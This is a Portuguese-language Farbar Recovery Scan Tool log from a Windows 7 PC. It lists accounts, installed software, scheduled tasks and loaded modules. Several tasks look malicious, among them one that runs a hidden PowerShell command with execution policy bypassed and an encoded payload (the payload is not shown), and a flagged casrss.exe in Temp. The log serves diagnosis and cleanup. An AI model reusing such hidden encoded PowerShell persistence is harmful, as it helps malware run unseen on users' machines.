cjoint

Document format: text/plain

Preview

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:27-01-2016
Executado por Volkhadan (2016-02-06 12:04:40)
Executando a partir de C:\Users\Volkhadan\Desktop
Windows 7 Professional Service Pack 1 (X64) (2014-06-14 19:11:32)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-1084134890-3557609745-897204792-500 - Administrator - Disabled)
Convidado (S-1-5-21-1084134890-3557609745-897204792-501 - Limited - Disabled)
Volkhadan (S-1-5-21-1084134890-3557609745-897204792-1001 - Administrator - Enabled) => C:\Users\Volkhadan

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
AC-3 ACM Codec x64 2.2 (HKLM\...\AC3ACM) (Version: 2.2 - fccHandler)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)
Adobe After Effects CC 2014 (HKLM-x32\...\{2B22C750-5C3B-4738-B621-BA786AC7A494}) (Version: 13.0.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2014 (HKLM-x32\...\{663DEEEF-EF34-4DCB-8687-73A7AA146E02}) (Version: 8.0.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.9.160 - Adobe Systems, Inc.)
AIDA64 Extreme Edition v2.85 (HKLM-x32\...\AIDA64 Extreme Edition_is1) (Version: 2.85 - FinalWire Ltd.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Ashampoo Burning Studio 15 v.15.0.2 (HKLM-x32\...\{91B33C97-5B38-0A92-D04A-A0F26F3F87D4}_is1) (Version: 15.0.2 - Ashampoo GmbH & Co. KG)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 3.8.7971 - DsNET Corp)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
CCleaner (HKLM\...\CCleaner) (Version: 4.15 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
CPUID HWMonitor 1.26 (HKLM\...\CPUID HWMonitor_is1) (Version: - )
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Disk Space Finder (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\c6ddfe369f967ae4) (Version: 1.1.0.4 - IntelliConcepts)
DriverEasy 4.7.1 (HKLM\...\DriverEasy_is1) (Version: 4.7.1.0 - Easeware)
DriverToolkit version 8.3.0.0 (HKLM-x32\...\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1) (Version: 8.3.0.0 - Megaify Software)
DriveSpacio 0.2.2 Build 1 (Beta) (HKLM-x32\...\DriveSpacio_is1) (Version: - Agitaf)
Dropbox (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\Dropbox) (Version: 3.12.5 - Dropbox, Inc.)
Duplicate Cleaner Free 3.2.6 (HKLM-x32\...\Duplicate Cleaner Free) (Version: 3.2.6 - DigitalVolcano Software Ltd) <==== ATENÇÃO
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
ffdshow x64 v1.3.4500 [2013-01-06] (HKLM\...\ffdshow64_is1) (Version: 1.3.4500.0 - )
Foxit PDF Editor (HKLM-x32\...\Foxit PDF Editor) (Version: 2.2.1.1119 - Foxit Corporation)
Foxit Reader 5.1 (HKLM-x32\...\Foxit Reader_is1) (Version: 5.1.4.104 - Foxit Corporation)
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.103 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HandBrake 0.10.3 (HKLM-x32\...\HandBrake) (Version: 0.10.3 - )
Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2555 - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MiniTool Partition Wizard Free 9.1 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version: - MiniTool Solution Ltd.)
Mozilla Firefox 43.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 43.0.1 (x86 pt-BR)) (Version: 43.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.1.5828 - Mozilla)
MPC-HC 1.6.8 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.6.8.7417 - MPC-HC Team)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.6.2.1863 - Native Instruments)
Native Instruments Guitar Rig 3 (HKLM-x32\...\Native Instruments Guitar Rig 3) (Version: - )
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.5.2.1549 - Native Instruments)
Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.6.8.382 - Native Instruments)
Need for Speed Underground 2 (HKLM-x32\...\Need for Speed Underground 2) (Version: - )
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Preset Manager 2.0 (HKLM-x32\...\{FCFE3F81-C977-4D31-877B-2778BB2A02DE}) (Version: 2.0.114 - Sony)
PreSonus Studio One 2 x64 (HKLM\...\PreSonus Studio One 2) (Version: 2.5.0.20189 - PreSonus Audio Electronics)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RealDownloader (x32 Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5964 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173F09590E16}) (Version: 1.00.0180 - REALTEK Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Recuva (HKLM\...\Recuva) (Version: 1.42 - Piriform)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version: - Microsoft) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Sony Sound Forge 7.0 (HKLM-x32\...\{0712667C-A171-49AE-A098-4ACDA28625F8}) (Version: 7.0.214 - Sony)
SoundTap Streaming Audio Recorder (HKLM-x32\...\SoundTap) (Version: - NCH Software)
Spotify (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
StrongRecovery (HKLM-x32\...\StrongRecovery) (Version: - )
Subtitle Workshop 2.51 (HKLM-x32\...\SubtitleWorkshop) (Version: - )
Suporte para Aplicativos Apple (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
SurCode for Dolby Pro Logic II (HKLM-x32\...\SurCode for Dolby Pro Logic II) (Version: - )
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.6.2.13 - Synaptics Incorporated)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Expendabros (HKLM-x32\...\Steam App 312990) (Version: - Free Lives)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.9 - TOSHIBA Corporation)
Unity Web Player (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
US-122 MKII / US-144 MKII (HKLM\...\USB_AUDIO_DEusb-audio.deTascam) (Version: - )
Vegas Pro 12.0 (64-bit) (HKLM\...\{A7500970-FE98-11E1-B560-F04DA23A5C58}) (Version: 12.0.367 - Sony)
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 4.05 - NCH Software)
VirtualDJ PRO Full (HKLM-x32\...\{74F28F11-404B-4CEA-92FF-37BF476F239E}) (Version: 7.0.3 - Atomix Productions)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Warsaw 1.11.0.42826 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.11.0.42826 - GAS Tecnologia)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0000}\InprocServer32 -> C:\Users\Volkhadan\AppData\Local\GAS Tecnologia\GBBD\npsf_bb_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0000}\InprocServer32 -> C:\Users\Volkhadan\AppData\Local\GAS Tecnologia\GBBD\npsf_bb_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {0D8516BD-208D-40C6-9F6B-4DB9982409B2} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {1CCD6D15-2D2D-4ACF-AD84-49E8CBD5E45E} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2014-05-29] (Easeware)
Task: {3868E696-F8C1-47A1-B73E-1799B3AD82EC} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {4015C241-A16A-4E55-B79D-27CBFD44D521} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-10-26] (RealNetworks, Inc.)
Task: {40275530-E2C3-4AFE-93D4-7DC1B4817945} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-27] (Adobe Systems Incorporated)
Task: {53D0D045-0E21-4607-9ED2-20EB9A1994A5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5B45DDE0-72ED-4C7D-A0FE-FEC0730A5795} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-17] (Facebook Inc.)
Task: {679FA0DC-92A3-4116-8F96-19899B05C9F7} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {6B4B1564-4CC4-425B-A9F6-54276DA17278} - System32\Tasks\Pritc => C:\Users\Volkhadan\AppData\Local\Temp\00017564\casrss.exe <==== ATENÇÃO
Task: {793D7F47-A5F2-4E73-B90B-45FAD747DA6D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {97C3DA4E-F1CA-4E63-8DD9-4AAA5AEF67C1} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-17] (Facebook Inc.)
Task: {9DF8DDBA-4892-4BCF-B1F8-7464EF40BD67} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-02-04] ()
Task: {AE17415E-6BF0-415E-811D-E47B98EC3953} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2014-10-29] ()
Task: {B2C906D9-7B74-4043-9721-0EC9EF274623} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2014-10-26] (RealNetworks, Inc.)
Task: {C30D3198-C932-45F3-80CB-7BF2A803D680} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {C4661D71-90CC-4B6F-B82D-7F62B2EA02D7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {CBDA2C9E-7220-4415-B5D9-0EEA543B7CE3} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1084134890-3557609745-897204792-1001
Task: {DC9D56D9-845C-402C-B9EC-EB76B805DAE8} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {DE874BA5-B11A-44B6-A9E6-9132C9CE9A3F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {E38160DE-653B-4DA0-ABC6-A039E04FBB63} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {EAECD6FC-6EBF-4C04-8FCC-63BD5BFADECC} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-10-26] (RealNetworks, Inc.)
Task: {F964D381-6F24-401F-96A9-96A9F753D93D} - System32\Tasks\{0C0A0D47-0F7D-0F09-0811-0B7A080C110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core.job => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA.job => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core.job => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA.job => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

==================== Módulos Carregados (Whitelisted) ==============

2016-02-05 17:23 - 2016-02-05 17:23 - 00185344 _____ () C:\Program Files (x86)\455A527F-1454169737-DE11-88E5-00262236F727\knsfF36F.tmp
2014-10-26 22:59 - 2014-10-26 22:59 - 00039568 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-10-30 05:41 - 2014-10-30 05:41 - 00031856 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2016-01-30 14:03 - 2016-01-30 14:03 - 00416256 _____ () C:\Program Files (x86)\455A527F-1454169737-DE11-88E5-00262236F727\hnsj39B7.tmp
2014-06-25 17:51 - 2014-06-25 17:51 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-01-30 14:03 - 2016-01-30 14:03 - 00307712 _____ () C:\Program Files (x86)\455A527F-1454169737-DE11-88E5-00262236F727\jnsp1A25.tmp
2014-10-29 19:06 - 2014-10-29 19:06 - 00560192 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
2014-07-31 13:16 - 2014-07-31 13:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 13:16 - 2014-07-31 13:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-10-13 21:58 - 2014-12-15 10:27 - 00865880 _____ () c:\program files (x86)\real\realplayer\RPDS\Plugins\cldplin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00035976 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00039560 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00032888 _____ () C:\Program Files (x86)\Real\UpdateService\RPDSUpdatePlugin.dll
2015-12-15 18:48 - 2015-10-30 22:59 - 00034768 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00019408 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00022848 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Random.OSRNG.winrandom.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00023352 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Util._counter.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00042296 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Cipher._AES.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00116688 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2015-12-15 18:48 - 2015-10-30 22:59 - 00093640 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00018376 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\select.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00019760 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00105928 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32api.pyd
